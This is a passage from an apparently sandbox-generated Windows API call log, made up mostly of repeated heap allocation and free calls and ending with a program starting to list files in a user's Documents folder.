dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.737] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c20e8 [0232.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.737] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.738] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.738] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.738] PathFindFileNameW (pszPath="") returned="" [0232.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xb4anhaDsw_nEnBFeS", cAlternateFileName="XB4ANH~1")) returned 